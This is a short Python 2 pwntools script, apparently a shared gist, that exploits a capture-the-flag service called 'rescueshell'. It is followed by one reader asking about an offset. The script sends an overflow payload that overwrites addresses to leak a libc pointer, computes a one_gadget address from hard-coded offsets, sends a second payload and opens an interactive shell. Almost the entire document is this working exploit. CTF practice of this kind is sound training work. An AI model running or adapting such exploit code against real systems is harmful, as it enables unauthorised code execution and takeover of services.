#!/usr/bin/python
# Python 2 script (print statement, raw_input, str used as a byte buffer);
# it will not run unmodified under Python 3.
# All addresses and offsets below are hard-coded constants supplied by the
# author; their meaning is not explained anywhere in this file.
import pwn
import struct
# Open a TCP connection to the remote service named here.
p = pwn.remote("rescueshell.challs.malice.fr",6060)
# p = pwn.process("./rescue")
# Block until Enter is pressed (presumably to allow attaching a debugger
# when the local-process line above is used instead).
raw_input("ATTACH NOW")
# First message: a run of filler bytes followed by two little-endian 64-bit
# values (pwn.p64). The author's labels are kept; they are not documented here.
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601210 + 320) # PRINTF
payload += pwn.p64(0x40099a) # WRITE GADGET
# Drain whatever the service has already sent, then send the message.
p.recv()
p.sendline(payload)
# Read the response; whatever arrived within 2 seconds (possibly empty).
data = p.recv(timeout=2)
# i think it eats zeros. lets grab 0x7f as the start.
print "DATA IS: " + data.encode("hex")
# Keep the first 6 bytes and zero-extend to 8. If fewer than 6 bytes
# arrived, the slice is shorter and the unpack below raises struct.error.
data = data[0:6] + "\x00\x00"
# "<Q" = one unsigned 64-bit little-endian integer; the result is a 1-tuple.
strncmp_leak = struct.unpack("<Q",data[0:8])
print hex(strncmp_leak[0])
# fread
# Offset arithmetic on the unpacked value using author-supplied constants.
one_gadget = strncmp_leak[0] - 0x6A460 + 0x41320
print "one_gadget leak at %x" % one_gadget
# Second message: same filler, a different author-labelled address, then the
# value computed above.
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601208 + 320) # PRINTF
payload += pwn.p64(one_gadget)
p.sendline(payload)
# Hand the connection over to the terminal.
p.interactive()
squalltan2000 Apr 2, 2018

May I know which offset is 0x41320

May I know which offset is 0x41320

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment